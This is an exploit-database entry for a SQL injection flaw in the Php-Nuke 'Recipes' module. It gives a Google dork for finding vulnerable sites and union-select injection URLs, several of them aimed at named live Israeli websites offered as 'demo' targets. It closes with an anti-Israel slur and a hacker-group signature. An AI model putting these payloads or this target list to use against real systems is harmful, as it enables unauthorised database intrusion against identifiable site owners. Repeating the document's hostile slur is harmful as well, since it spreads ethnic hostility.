Php-Nuke Module 'Recipes' SQL Injection Vulnerabil



EKU-ID: 163 CVE: OSVDB-ID:
Author: expku Published: 2011-05-09 Verified: Verified
Download:

Rating

Home


################################################################## # Title : Php-Nuke Module 'Recipes' SQL Injection Vulnerability (BigBUG) # # Author: Scientist # # Vendor: [http://phpnuke.org/] # # Email : shits@hotmail.com.tr # # date : 06.06.2011 # # Google Dork : inurl:name=Recipes+recipeid # # category : Web Apps [SQli] # # Dipnot: Amen aga nas谋l kanald yi hackledin y枚ntemin ad谋n谋 s枚le bari :) ################################################################## *SQL injection Vulnerability* # http://[localhost]/modules.php?name=Recipes&op=viewrecipe&recipeid=[num]' # http://[localhost]/modules.php?name=Recipes&op=viewrecipe&recipeid= [SQLI] *Live Demo Site: #http://www.cookshare.co.il/modules.php?name=Recipes&op=viewrecipe&recipeid=2080+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- #http://wilton.co.il/modules.php?name=Recipes&op=viewrecipe&recipeid=2080+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- #http://www.lovesite.co.il/modules.php?name=Recipes&op=viewrecipe&recipeid=76+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- #[f*ck israel!] ================================================= # group: RootArea & GriAdamlar ================================================= # [!] Produced in Turkey #